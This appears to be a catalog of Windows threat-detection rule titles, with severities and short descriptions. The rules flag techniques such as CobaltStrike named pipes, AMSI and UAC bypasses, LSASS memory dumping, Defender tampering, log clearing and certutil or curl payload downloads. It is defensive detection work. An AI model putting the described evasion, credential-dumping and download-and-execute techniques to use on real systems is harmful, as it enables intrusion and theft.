Outbound Network Connection Initiated By Cmstp.EXEhighDetects a network connection initiated by Cmstp.EXE Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
Network Connection Initiated Via Notepad.EXEhighDetects a network connection that is initiated by the "notepad.exe" process. This might be a sign of process injection from a beacon process or something similar. Notepad rarely initiates a network communication except when printing documents for example.
Office Application Initiated Network Connection Over Uncommon PortsmediumDetects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
RegAsm.EXE Initiating Network Connection To Public IPmediumDetects "RegAsm.exe" initiating a network connection to public IP adresses
Network Connection Initiated By Regsvr32.EXEmediumDetects a network connection initiated by "Regsvr32.exe"
Microsoft Sync Center Suspicious Network ConnectionsmediumDetects suspicious connections from Microsoft Sync Center to non-private IPs.
Rundll32 Internet ConnectionmediumDetects a rundll32 that communicates with public IP addresses
Outbound Network Connection To Public IP Via WinlogonmediumDetects a "winlogon.exe" process that initiate network communications with public IP addresses
CobaltStrike Named PipecriticalDetects the creation of a named pipe as used by CobaltStrike
Suspicious Network Connection Binary No CommandLinehighDetects suspicious network connections made by a well-known Windows binary run with no command line parameters
Suspicious Wordpad Outbound ConnectionsmediumDetects a network connection initiated by "wordpad.exe" over uncommon destination ports. This might indicate potential process injection activity from a beacon or similar mechanisms.
CobaltStrike Named Pipe Pattern RegexcriticalDetects the creation of a named pipe matching a pattern used by CobaltStrike Malleable C2 profiles
Potentially Suspicious Wuauclt Network ConnectionmediumDetects the use of the Windows Update Client binary (wuauclt.exe) to proxy execute code and making network connections. One could easily make the DLL spawn a new process and inject to it to proxy the network connection and bypass this rule.
CobaltStrike Named Pipe PatternshighDetects the creation of a named pipe with a pattern found in CobaltStrike malleable C2 profiles
HackTool - CoercedPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool CoercedPotato
HackTool - EfsPotato Named Pipe CreationhighDetects the pattern of a pipe name as used by the hack tool EfsPotato
Malicious Named Pipe CreatedcriticalDetects the creation of a named pipe seen used by known APTs or malware.
PowerShell Downgrade Attack - PowerShellmediumDetects PowerShell downgrade attack by comparing the host versions with the actually used engine version 2.0
PowerShell Called from an Executable Version MismatchhighDetects PowerShell called from an executable by the version mismatch method
Potential RemoteFXvGPUDisablement.EXE AbusehighDetects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
Tamper Windows Defender - PSClassichighAttempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
Clear PowerShell History - PowerShell ModulemediumDetects keywords that could indicate clearing PowerShell history
PowerShell Decompress CommandsinformationalA General detection for specific decompress commands in PowerShell logs. This could be an adversary decompressing files.
Invoke-Obfuscation CLIP+ Launcher - PowerShell ModulehighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShell ModulehighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the code block cited in the reference section below
Invoke-Obfuscation STDIN+ Launcher - PowerShell ModulehighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShell ModulehighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShell ModulemediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShell ModulemediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - PowerShell ModulehighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use MSHTA - PowerShell ModulehighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Clip - PowerShell ModulehighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShell ModulehighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShell ModulehighDetects Obfuscated Powershell via VAR++ LAUNCHER
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ModulehighDetects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
SyncAppvPublishingServer Bypass Powershell Restriction - PS ModulemediumDetects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
AMSI Bypass Pattern Assembly GetTypehighDetects code fragments found in small and obfuscated AMSI bypass PowerShell scripts
Potential AMSI Bypass Script Using NULL BitsmediumDetects usage of special strings/null bits in order to potentially bypass AMSI functionalities
Clearing Windows Console HistoryhighIdentifies when a user attempts to clear console history. An adversary may clear the command history of a compromised account to conceal the actions undertaken during an intrusion.
Clear PowerShell History - PowerShellmediumDetects keywords that could indicate clearing PowerShell history
Powershell Detect Virtualization EnvironmentmediumAdversaries may employ various system checks to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox
Disable Powershell Command HistoryhighDetects scripts or commands that disabled the Powershell command history by removing psreadline module
Disable-WindowsOptionalFeature Command PowerShellhighDetect built in PowerShell cmdlet Disable-WindowsOptionalFeature, Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Potential In-Memory Execution Using Reflection.AssemblymediumDetects usage of "Reflection.Assembly" load functions to dynamically load assemblies in memory
Potential Suspicious Windows Feature EnabledmediumDetects usage of the built-in PowerShell cmdlet "Enable-WindowsOptionalFeature" used as a Deployment Image Servicing and Management tool. Similar to DISM.exe, this cmdlet is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Disable of ETW Trace - PowershellhighDetects usage of powershell cmdlets to disable or remove ETW trace sessions
HackTool - WinPwn Execution - ScriptBlockhighDetects scriptblock text keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation.
Unsigned AppX Installation Attempt Using Add-AppxPackage - PsScriptmediumDetects usage of the "Add-AppxPackage" or it's alias "Add-AppPackage" to install unsigned AppX packages
Invoke-Obfuscation CLIP+ Launcher - PowerShellhighDetects Obfuscated use of Clip.exe to execute PowerShell
Invoke-Obfuscation Obfuscated IEX Invocation - PowerShellhighDetects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014
Invoke-Obfuscation STDIN+ Launcher - PowershellhighDetects Obfuscated use of stdin to execute PowerShell
Invoke-Obfuscation VAR+ Launcher - PowerShellhighDetects Obfuscated use of Environment Variables to execute PowerShell
Invoke-Obfuscation COMPRESS OBFUSCATION - PowerShellmediumDetects Obfuscated Powershell via COMPRESS OBFUSCATION
Invoke-Obfuscation RUNDLL LAUNCHER - PowerShellmediumDetects Obfuscated Powershell via RUNDLL LAUNCHER
Invoke-Obfuscation Via Stdin - PowershellhighDetects Obfuscated Powershell via Stdin in Scripts
Invoke-Obfuscation Via Use Clip - PowershellhighDetects Obfuscated Powershell via use Clip.exe in Scripts
Invoke-Obfuscation Via Use MSHTA - PowerShellhighDetects Obfuscated Powershell via use MSHTA in Scripts
Invoke-Obfuscation Via Use Rundll32 - PowerShellhighDetects Obfuscated Powershell via use Rundll32 in Scripts
Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - PowerShellhighDetects Obfuscated Powershell via VAR++ LAUNCHER
Modify Group Policy Settings - ScriptBlockLoggingmediumDetect malicious GPO modifications can be used to implement many other malicious behaviors.
NTFS Alternate Data StreamhighDetects writing data into NTFS alternate data streams from powershell. Needs Script Block Logging.
Potential RemoteFXvGPUDisablement.EXE Abuse - PowerShell ScriptBlockhighDetects PowerShell module creation where the module Contents are set to "function Get-VMRemoteFXPhysicalVideoAdapter". This could be a sign of potential abuse of the "RemoteFXvGPUDisablement.exe" binary which is known to be vulnerable to module load-order hijacking.
Root Certificate Installed - PowerShellmediumAdversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
Suspicious Invoke-Item From Mount-DiskImagemediumAdversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
PowerShell Script Change Permission Via Set-Acl - PsScriptlowDetects PowerShell scripts set ACL to of a file or a folder
PowerShell Set-Acl On Windows Folder - PsScripthighDetects PowerShell scripts to set the ACL to a file in the Windows folder
PowerShell ShellCodehighDetects Base64 encoded Shellcode
Powershell Store File In Alternate Data StreammediumStoring files in Alternate Data Stream (ADS) similar to Astaroth malware.
Potential Persistence Via Security Descriptors - ScriptBlockhighDetects usage of certain functions and keywords that are used to manipulate security descriptors in order to potentially set a backdoor. As seen used in the DAMP project.
Potential PowerShell Obfuscation Using Character JoinlowDetects specific techniques often seen used inside of PowerShell scripts to obfscuate Alias creation
Suspicious Eventlog ClearmediumDetects usage of known powershell cmdlets such as "Clear-EventLog" to clear the Windows event logs
Troubleshooting Pack Cmdlet ExecutionmediumDetects execution of "TroubleshootingPack" cmdlets to leverage CVE-2022-30190 or action similar to "msdt" lolbin (as described in LOLBAS)
Suspicious Hyper-V CmdletsmediumAdversaries may carry out malicious operations using a virtual instance to avoid detection
Suspicious IO.FileStreammediumOpen a handle on the drive volume via the \\.\ DOS device path specifier and perform direct access read of the first few bytes of the volume.
PowerShell Deleted Mounted SharemediumDetects when when a mounted share is removed. Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation
Suspicious Mount-DiskImagelowAdversaries may abuse container files such as disk image (.iso, .vhd) file formats to deliver malicious payloads that may not be tagged with MOTW.
Suspicious Service DACL Modification Via Set-Service Cmdlet - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Potential PowerShell Obfuscation Using Alias CmdletslowDetects Set-Alias or New-Alias cmdlet usage. Which can be use as a mean to obfuscate PowerShell scripts
Suspicious Start-Process PassThrumediumPowershell use PassThru option to start in background
Suspicious Unblock-FilemediumRemove the Zone.Identifier alternate data stream which identifies the file as downloaded from the internet.
Suspicious PowerShell WindowStyle OptionmediumAdversaries may use hidden windows to conceal malicious activity from the plain sight of users. In some cases, windows that would typically be displayed when an application carries out an operation can be hidden
PowerShell Write-EventLog UsagemediumDetects usage of the "Write-EventLog" cmdlet with 'RawData' flag. The cmdlet can be levreage to write malicious payloads to the EventLog and then retrieve them later for later use
SyncAppvPublishingServer Execution to Bypass Powershell RestrictionmediumDetects SyncAppvPublishingServer process execution which usually utilized by adversaries to bypass PowerShell execution restrictions.
Tamper Windows Defender Remove-MpPreference - ScriptBlockLogginghighDetects attempts to remove Windows Defender configuration using the 'MpPreference' cmdlet
Tamper Windows Defender - ScriptBlockLogginghighDetects PowerShell scripts attempting to disable scheduled scanning and other parts of Windows Defender ATP or set default actions to allow.
Powershell TimestompmediumAdversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder.
Powershell Token Obfuscation - PowershellhighDetects TOKEN OBFUSCATION technique from Invoke-Obfuscation
Abuse of Service Permissions to Hide Services Via Set-Service - PShighDetects usage of the "Set-Service" powershell cmdlet to configure a new SecurityDescriptor that allows a service to be hidden from other utilities such as "sc.exe", "Get-Service"...etc. (Works only in powershell 7)
Potentially Suspicious Call To Win32_NTEventlogFile Class - PSScriptmediumDetects usage of the WMI class "Win32_NTEventlogFile" in a potentially suspicious way (delete, backup, change permissions, etc.) from a PowerShell script
PowerShell WMI Win32_Product Install MSImediumDetects the execution of an MSI file using PowerShell and the WMI Win32_Product class
Windows Firewall Profile DisabledmediumDetects when a user disables the Windows Firewall via a Profile to help evade defense.
Windows Defender Exclusions Added - PowerShellmediumDetects modifications to the Windows Defender configuration settings using PowerShell to add exclusions
Suspicious X509Enrollment - Ps ScriptmediumDetect use of X509Enrollment
CMSTP Execution Process AccesshighDetects various indicators of Microsoft Connection Manager Profile Installer execution
HackTool - CobaltStrike BOF Injection PatternhighDetects a typical pattern of a CobaltStrike BOF which inject into other processes
HackTool - HandleKatz Duplicating LSASS HandlehighDetects HandleKatz opening LSASS to duplicate its handle to later dump the memory without opening any new handles
HackTool - SysmonEnte ExecutionhighDetects the use of SysmonEnte, a tool to attack the integrity of Sysmon
Uncommon Process Access Rights For Target ImagelowDetects process access request to uncommon target images with a "PROCESS_ALL_ACCESS" access mask.
Suspicious Svchost Process AccesshighDetects suspicious access to the "svchost" process such as that used by Invoke-Phantom to kill the thread of the Windows event logging service.
Function Call From Undocumented COM Interface EditionUpgradeManagermediumDetects function calls from the EditionUpgradeManager COM interface. Which is an interface that is not used by standard executables.
UAC Bypass Using WOW64 Logger DLL HijackhighDetects the pattern of UAC Bypass using a WoW64 logger DLL hijack (UACMe 30)
Suspicious AddinUtil.EXE CommandLine ExecutionhighDetects execution of the Add-In deployment cache updating utility (AddInutil.exe) with suspicious Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
Uncommon Child Process Of AddinUtil.EXEmediumDetects uncommon child processes of the Add-In deployment cache updating utility (AddInutil.exe) which could be a sign of potential abuse of the binary to proxy execution via a custom Addins.Store payload.
Uncommon AddinUtil.EXE CommandLine ExecutionmediumDetects execution of the Add-In deployment cache updating utility (AddInutil.exe) with uncommon Addinroot or Pipelineroot paths. An adversary may execute AddinUtil.exe with uncommon Addinroot/Pipelineroot paths that point to the adversaries Addins.Store payload.
AddinUtil.EXE Execution From Uncommon DirectorymediumDetects execution of the Add-In deployment cache updating utility (AddInutil.exe) from a non-standard directory.
Potential Adplus.EXE AbusehighDetects execution of "AdPlus.exe", a binary that is part of the Windows SDK that can be used as a LOLBIN in order to dump process memory and execute arbitrary commands.
AgentExecutor PowerShell ExecutionmediumDetects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
Suspicious AgentExecutor PowerShell ExecutionhighDetects execution of the AgentExecutor.exe binary. Which can be abused as a LOLBIN to execute powershell scripts with the ExecutionPolicy "Bypass" or any binary named "powershell.exe" located in the path provided by 6th positional argument
Uncommon Child Process Of Appvlp.EXEmediumDetects uncommon child processes of Appvlp.EXE Appvlp or the Application Virtualization Utility is included with Microsoft Office. Attackers are able to abuse "AppVLP" to execute shell commands. Normally, this binary is used for Application Virtualization, but it can also be abused to circumvent the ASR file path rule folder or to mark a file as a system file.
AspNetCompiler ExecutionmediumDetects execution of "aspnet_compiler.exe" which can be abused to compile and execute C# code.
Suspicious Child Process of AspNetCompilerhighDetects potentially suspicious child processes of "aspnet_compiler.exe".
Potentially Suspicious ASP.NET Compilation Via AspNetCompilerhighDetects execution of "aspnet_compiler.exe" with potentially suspicious paths for compilation.
Uncommon Assistive Technology Applications Execution Via AtBroker.EXEmediumDetects the start of a non built-in assistive technology applications via "Atbroker.EXE".
Hiding Files with Attrib.exemediumDetects usage of attrib.exe to hide files from users.
Set Suspicious Files as System Files Using Attrib.EXEhighDetects the usage of attrib with the "+s" option to set scripts or executables located in suspicious locations as system files to hide them from users and make them unable to be deleted with simple rights. The rule limits the search to specific extensions and directories to avoid FPs
Audit Policy Tampering Via NT Resource Kit AuditpolhighThreat actors can use an older version of the auditpol binary available inside the NT resource kit to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Audit Policy Tampering Via AuditpolhighThreat actors can use auditpol binary to change audit policy configuration to impair detection capability. This can be carried out by selectively disabling/removing certain audit policies as well as restoring a custom policy owned by the threat actor.
Indirect Inline Command Execution Via Bash.EXEmediumDetects execution of Microsoft bash launcher with the "-c" flag. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Indirect Command Execution From Script File Via Bash.EXEmediumDetects execution of Microsoft bash launcher without any flags to execute the content of a bash script directly. This can be used to potentially bypass defenses and execute Linux or Windows-based binaries directly via bash.
Potential Ransomware or Unauthorized MBR Tampering Via Bcdedit.EXEmediumDetects potential malicious and unauthorized usage of bcdedit.exe
Suspicious Child Process Of BgInfo.EXEhighDetects suspicious child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
BitLockerTogo.EXE ExecutionlowDetects the execution of "BitLockerToGo.EXE". BitLocker To Go is BitLocker Drive Encryption on removable data drives. This feature includes the encryption of, USB flash drives, SD cards, External hard disk drives, Other drives that are formatted by using the NTFS, FAT16, FAT32, or exFAT file system. This is a rarely used application and usage of it at all is worth investigating. Malware such as Lumma stealer has been seen using this process as a target for process hollowing.
Uncommon Child Process Of BgInfo.EXEmediumDetects uncommon child processes of "BgInfo.exe" which could be a sign of potential abuse of the binary to proxy execution via external VBScript
Suspicious Download From Direct IP Via BitsadminhighDetects usage of bitsadmin downloading a file using an URL that contains an IP
File Download Via BitsadminmediumDetects usage of bitsadmin downloading a file
Suspicious Download From File-Sharing Website Via BitsadminhighDetects usage of bitsadmin downloading a file from a suspicious domain
File With Suspicious Extension Downloaded Via BitsadminhighDetects usage of bitsadmin downloading a file with a suspicious extension
File Download Via Bitsadmin To A Suspicious Target FolderhighDetects usage of bitsadmin downloading a file to a suspicious target folder
File Download Via Bitsadmin To An Uncommon Target FoldermediumDetects usage of bitsadmin downloading a file to uncommon target folder
Monitoring For Persistence Via BITSmediumBITS will allow you to schedule a command to execute after a successful download to notify you that the job is finished. When the job runs on the system the command specified in the BITS job will be executed. This can be abused by actors to create a backdoor within the system and for persistence. It will be chained in a BITS job to schedule the download of malware/additional binaries and execute the program after being downloaded.
Suspicious Calculator UsagehighDetects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion.
Potential Binary Proxy Execution Via Cdb.EXEmediumDetects usage of "cdb.exe" to launch arbitrary processes or commands from a debugger script file
New Root Certificate Installed Via CertMgr.EXEmediumDetects execution of "certmgr" with the "add" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
DLL Loaded via CertOC.EXEmediumDetects when a user installs certificates by using CertOC.exe to loads the target DLL file.
Suspicious DLL Loaded via CertOC.EXEhighDetects when a user installs certificates by using CertOC.exe to load the target DLL file.
New Root Certificate Installed Via Certutil.EXEmediumDetects execution of "certutil" with the "addstore" flag in order to install a new certificate on the system. Adversaries may install a root certificate on a compromised system to avoid warnings when connecting to adversary controlled web servers.
File Decoded From Base64/Hex Via Certutil.EXEmediumDetects the execution of certutil with either the "decode" or "decodehex" flags to decode base64 or hex encoded files. This can be abused by attackers to decode an encoded payload before execution
Suspicious Download Via Certutil.EXEmediumDetects the execution of certutil with certain flags that allow the utility to download files.
Suspicious File Downloaded From Direct IP Via Certutil.EXEhighDetects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Suspicious File Downloaded From File-Sharing Website Via Certutil.EXEhighDetects the execution of certutil with certain flags that allow the utility to download files from file-sharing websites.
File Encoded To Base64 Via Certutil.EXEmediumDetects the execution of certutil with the "encode" flag to encode a file to base64. This can be abused by threat actors and attackers for data exfiltration
Potential NTLM Coercion Via Certutil.EXEhighDetects possible NTLM coercion via certutil using the 'syncwithWU' flag
Suspicious File Encoded To Base64 Via Certutil.EXEhighDetects the execution of certutil with the "encode" flag to encode a file to base64 where the extensions of the file is suspicious
File In Suspicious Location Encoded To Base64 Via Certutil.EXEhighDetects the execution of certutil with the "encode" flag to encode a file to base64 where the files are located in potentially suspicious locations
Certificate Exported Via Certutil.EXEmediumDetects the execution of the certutil with the "exportPFX" flag which allows the utility to export certificates.
Suspicious CodePage Switch Via CHCPmediumDetects a code page switch in command line or batch scripts to a rare language
Process Access via TrolleyExpress ExclusionhighDetects a possible process memory dump that uses the white-listed Citrix TrolleyExpress.exe filename as a way to dump the lsass process memory
Potential Arbitrary File Download Via Cmdl32.EXEmediumDetects execution of Cmdl32 with the "/vpn" and "/lan" flags. Attackers can abuse this utility in order to download arbitrary files via a configuration file. Inspect the location and the content of the file passed as an argument in order to determine if it is suspicious.
Curl Download And Execute CombinationhighAdversaries can use curl to download payloads remotely and execute them. Curl is included by default in Windows 10 build 17063 and later.
File Deletion Via DellowDetects execution of the builtin "del"/"erase" commands in order to delete files. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Greedy File Deletion Using DelmediumDetects execution of the "del" builtin command to remove files using greedy/wildcard expression. This is often used by malware to delete content of folders that perhaps contains the initial malware infection or to delete evidence.
NtdllPipe Like Activity ExecutionhighDetects command that type the content of ntdll.dll to a different file or a pipe in order to evade AV / EDR detection. As seen being used in the POC NtdllPipe
Potentially Suspicious Ping/Copy Command CombinationmediumDetects uncommon and potentially suspicious one-liner command containing both "ping" and "copy" at the same time, which is usually used by malware.
Suspicious Ping/Del Command CombinationhighDetects a method often used by ransomware. Which combines the "ping" to wait a couple of seconds and then "del" to delete the file in question. Its used to hide the file responsible for the initial infection for example
Potentially Suspicious CMD Shell Output RedirectmediumDetects inline Windows shell commands redirecting output via the ">" symbol to a suspicious location. This technique is sometimes used by malicious actors in order to redirect the output of reconnaissance commands such as "hostname" and "dir" to files for future exfiltration.
Directory Removal Via RmdirlowDetects execution of the builtin "rmdir" command in order to delete directories. Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
CMSTP Execution Process CreationhighDetects various indicators of Microsoft Connection Manager Profile Installer execution
Powershell Executed From Headless ConHost ProcessmediumDetects the use of powershell commands from headless ConHost window. The "--headless" flag hides the windows from the user upon execution.
Suspicious High IntegrityLevel Conhost Legacy OptioninformationalForceV1 asks for information directly from the kernel space. Conhost connects to the console application. High IntegrityLevel means the process is running with elevated privileges, such as an Administrator context.
Uncommon Child Process Of Conhost.EXEmediumDetects uncommon "conhost" child processes. This could be a sign of "conhost" usage as a LOLBIN or potential process injection activity.
Control Panel ItemshighDetects the malicious use of a control panel item
CreateDump Process DumphighDetects uses of the createdump.exe LOLOBIN utility to dump process memory
Dynamic .NET Compilation Via Csc.EXEmediumDetects execution of "csc.exe" to compile .NET code. Attackers often leverage this to compile code on the fly and use it in other stages.
Csc.EXE Execution Form Potentially Suspicious ParenthighDetects a potentially suspicious parent of "csc.exe", which could be a sign of payload delivery.
Suspicious Csi.exe UsagemediumCsi.exe is a signed binary from Microsoft that comes with Visual Studio and provides C# interactive capabilities. It can be used to run C# code from a file passed as a parameter in command line. Early version of this utility provided with Microsoft “Roslyn” Community Technology Preview was named 'rcsi.exe'
ManageEngine Endpoint Central Dctask64.EXE Potential AbusehighDetects the execution of "dctask64.exe", a signed binary by ZOHO Corporation part of ManageEngine Endpoint Central. This binary can be abused for DLL injection, arbitrary command and process execution.
Uncommon Child Process Of Defaultpack.EXEmediumDetects uncommon child processes of "DefaultPack.EXE" binary as a proxy to launch other programs
Potential DLL Sideloading Via DeviceEnroller.EXEmediumDetects the use of the PhoneDeepLink parameter to potentially sideload a DLL file that does not exist. This non-existent DLL file is named "ShellChromeAPI.dll". Adversaries can drop their own renamed DLL and execute it via DeviceEnroller.exe using this parameter
Potentially Suspicious Child Process Of ClickOnce ApplicationmediumDetects potentially suspicious child processes of a ClickOnce deployment application
Arbitrary MSI Download Via Devinit.EXEmediumDetects a certain command line flag combination used by "devinit.exe", which can be abused as a LOLBIN to download arbitrary MSI packages on a Windows system
Potentially Suspicious Child Process Of DiskShadow.EXEmediumDetects potentially suspicious child processes of "Diskshadow.exe". This could be an attempt to bypass parent/child relationship detection or application whitelisting rules.
Diskshadow Script Mode - Uncommon Script Extension ExecutionmediumDetects execution of "Diskshadow.exe" in script mode to execute an script with a potentially uncommon extension. Initial baselining of the allowed extension list is required.
Diskshadow Script Mode - Execution From Potential Suspicious LocationmediumDetects execution of "Diskshadow.exe" in script mode using the "/s" flag where the script is located in a potentially suspicious location.
Dism Remove Online PackagemediumDeployment Image Servicing and Management tool. DISM is used to enumerate, install, uninstall, configure, and update features and packages in Windows images
Dllhost.EXE Execution AnomalyhighDetects a "dllhost" process spawning with no commandline arguments which is very rare to happen and could indicate process injection activity or malware mimicking similar system processes.
DLL Sideloading by VMware Xfer UtilityhighDetects execution of VMware Xfer utility (VMwareXferlogs.exe) from the non-default directory which may be an attempt to sideload arbitrary DLL
New DNS ServerLevelPluginDll Installed Via Dnscmd.EXEhighDetects the installation of a DNS plugin DLL via ServerLevelPluginDll parameter in registry, which can be used to execute code in context of the DNS server (restart required)
Potential Application Whitelisting Bypass via Dnx.EXEmediumDetects the execution of Dnx.EXE. The Dnx utility allows for the execution of C# code. Attackers might abuse this in order to bypass application whitelisting.
Process Memory Dump Via Dotnet-DumpmediumDetects the execution of "dotnet-dump" with the "collect" flag. The execution could indicate potential process dumping of critical processes such as LSASS.
Arbitrary DLL or Csproj Code Execution Via Dotnet.EXEmediumDetects execution of arbitrary DLLs or unsigned code via a ".csproj" files via Dotnet.EXE.
Binary Proxy Execution Via Dotnet-Trace.EXEmediumDetects commandline arguments for executing a child process via dotnet-trace.exe
Potentially Over Permissive Permissions Granted Using Dsacls.EXEmediumDetects usage of Dsacls to grant over permissive permissions
Potential Password Spraying Attempt Using Dsacls.EXEmediumDetects possible password spraying attempts using Dsacls
DumpMinitool ExecutionmediumDetects the use of "DumpMinitool.exe" a tool that allows the dump of process memory via the use of the "MiniDumpWriteDump"
Suspicious DumpMinitool ExecutionhighDetects suspicious ways to use the "DumpMinitool.exe" binary
New Capture Session Launched Via DXCap.EXEmediumDetects the execution of "DXCap.EXE" with the "-c" flag, which allows a user to launch any arbitrary binary or windows package through DXCap itself. This can be abused to potentially bypass application whitelisting.
Potentially Suspicious Event Viewer Child ProcesshighDetects uncommon or suspicious child processes of "eventvwr.exe" which might indicate a UAC bypass attempt
Potentially Suspicious Cabinet File ExpansionmediumDetects the expansion or decompression of cabinet files from potentially suspicious or uncommon locations, e.g. seen in Iranian MeteorExpress related attacks
Explorer Process Tree BreakmediumDetects a command line process that uses explorer.exe to launch arbitrary commands or binaries, which is similar to cmd.exe /c, only it breaks the process tree and makes its parent a new instance of explorer spawning from "svchost"
Explorer NOUACCHECK FlaghighDetects suspicious starts of explorer.exe that use the /NOUACCHECK flag that allows to run all sub processes of that newly started explorer.exe without any UAC checks
Remote File Download Via Findstr.EXEmediumDetects execution of "findstr" with specific flags and a remote share path. This specific set of CLI flags would allow "findstr" to download the content of the file located on the remote share as described in the LOLBAS entry.
Findstr Launching .lnk FilemediumDetects usage of findstr to identify and execute a lnk file as seen within the HHS redirect attack
Insensitive Subfolder Search Via Findstr.EXElowDetects execution of findstr with the "s" and "i" flags for a "subfolder" and "insensitive" search respectively. Attackers sometimes leverage this built-in utility to search the system for interesting files or filter through results of commands.
Filter Driver Unloaded Via Fltmc.EXEmediumDetect filter driver unloading activity via fltmc.exe
Sysmon Driver Unloaded Via Fltmc.EXEhighDetects possible Sysmon filter driver unloaded via fltmc.exe
Forfiles.EXE Child Process MasqueradinghighDetects the execution of "forfiles" from a non-default location, in order to potentially spawn a custom "cmd.exe" from the current working directory.
Uncommon FileSystem Load Attempt By Format.comhighDetects the execution of format.com with an uncommon filesystem selection that could indicate a defense evasion activity in which "format.com" is used to load malicious DLL files or other programs.
Fsutil Suspicious InvocationhighDetects suspicious parameters of fsutil (deleting USN journal, configuring it with small size, etc). Might be used by ransomwares during the attack (seen by NotPetya and others).
Potential Arbitrary Command Execution Via FTP.EXEmediumDetects execution of "ftp.exe" script with the "-s" or "/s" flag and any child processes ran by "ftp.exe".
Potentially Suspicious GoogleUpdate Child ProcesshighDetects potentially suspicious child processes of "GoogleUpdate.exe"
Suspicious GUP UsagehighDetects execution of the Notepad++ updater in a suspicious directory, which is often used in DLL side-loading attacks
HH.EXE ExecutionlowDetects the execution of "hh.exe" to open ".chm" files.
Remote CHM File Download/Execution Via HH.EXEhighDetects the usage of "hh.exe" to execute/download remotely hosted ".chm" files.
HTML Help HH.EXE Suspicious Child ProcesshighDetects a suspicious child process of a Microsoft HTML Help (HH.exe)
Suspicious HH.EXE ExecutionhighDetects a suspicious execution of a Microsoft HTML Help (HH.exe)
HackTool - F-Secure C3 Load by Rundll32criticalF-Secure C3 produces DLLs with a default exported StartNodeRelay function.
CobaltStrike Load by Rundll32highRundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.
HackTool - CoercedPotato ExecutionhighDetects the use of CoercedPotato, a tool for privilege escalation
HackTool - Covenant PowerShell LauncherhighDetects suspicious command lines used in Covenant luanchers
HackTool - CrackMapExec PowerShell ObfuscationhighThe CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.
HackTool - DInjector PowerShell Cradle ExecutioncriticalDetects the use of the Dinject PowerShell cradle based on the specific flags
HackTool - EDRSilencer ExecutionhighDetects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.
HackTool - Empire PowerShell UAC BypasscriticalDetects some Empire PowerShell UAC bypass methods
HackTool - GMER Rootkit Detector and Remover ExecutionhighDetects the execution GMER tool based on image and hash fields.
HackTool - Impersonate ExecutionmediumDetects execution of the Impersonate tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively
